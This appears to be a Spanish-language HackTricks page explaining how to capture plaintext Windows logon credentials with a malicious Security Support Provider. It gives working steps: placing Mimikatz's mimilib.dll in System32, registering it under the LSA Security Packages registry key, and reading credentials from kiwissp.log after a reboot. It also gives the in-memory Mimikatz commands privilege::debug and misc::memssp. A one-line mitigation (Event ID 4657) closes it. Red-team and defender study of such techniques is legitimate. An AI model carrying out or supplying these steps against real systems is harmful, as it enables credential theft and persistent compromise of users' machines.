2.6 KiB
Aprende hacking en AWS desde cero hasta convertirte en un experto con htARTE (HackTricks AWS Red Team Expert)!
Otras formas de apoyar a HackTricks:
- Si quieres ver tu empresa anunciada en HackTricks o descargar HackTricks en PDF Consulta los PLANES DE SUSCRIPCIÓN!
- Obtén el oficial PEASS & HackTricks swag
- Descubre The PEASS Family, nuestra colección exclusiva de NFTs
- Únete al 💬 grupo de Discord o al grupo de telegram o síguenos en Twitter 🐦 @carlospolopm.
- Comparte tus trucos de hacking enviando PRs a los HackTricks y HackTricks Cloud repositorios de github.
SSP Personalizado
Aprende qué es un SSP (Proveedor de Soporte de Seguridad) aquí.
Puedes crear tu propio SSP para capturar en texto claro las credenciales utilizadas para acceder a la máquina.
Mimilib
Puedes usar el binario mimilib.dll proporcionado por Mimikatz. Esto registrará en un archivo todas las credenciales en texto claro.
Coloca el dll en C:\Windows\System32\
Obtén una lista de los Paquetes de Seguridad LSA existentes:
{% code title="atacante@objetivo" %}
PS C:\> reg query hklm\system\currentcontrolset\control\lsa\ /v "Security Packages"
HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa
Security Packages REG_MULTI_SZ kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u
Agrega mimilib.dll a la lista de Proveedores de Soporte de Seguridad (Security Packages):
reg add "hklm\system\currentcontrolset\control\lsa\" /v "Security Packages"
Y después de un reinicio, todas las credenciales se pueden encontrar en texto claro en C:\Windows\System32\kiwissp.log
En memoria
También puedes inyectar esto en memoria directamente usando Mimikatz (ten en cuenta que podría ser un poco inestable/no funcionar):
privilege::debug
misc::memssp
Esto no sobrevivirá a los reinicios.
Mitigación
ID de evento 4657 - Auditoría de creación/cambio de HKLM:\System\CurrentControlSet\Control\Lsa\SecurityPackages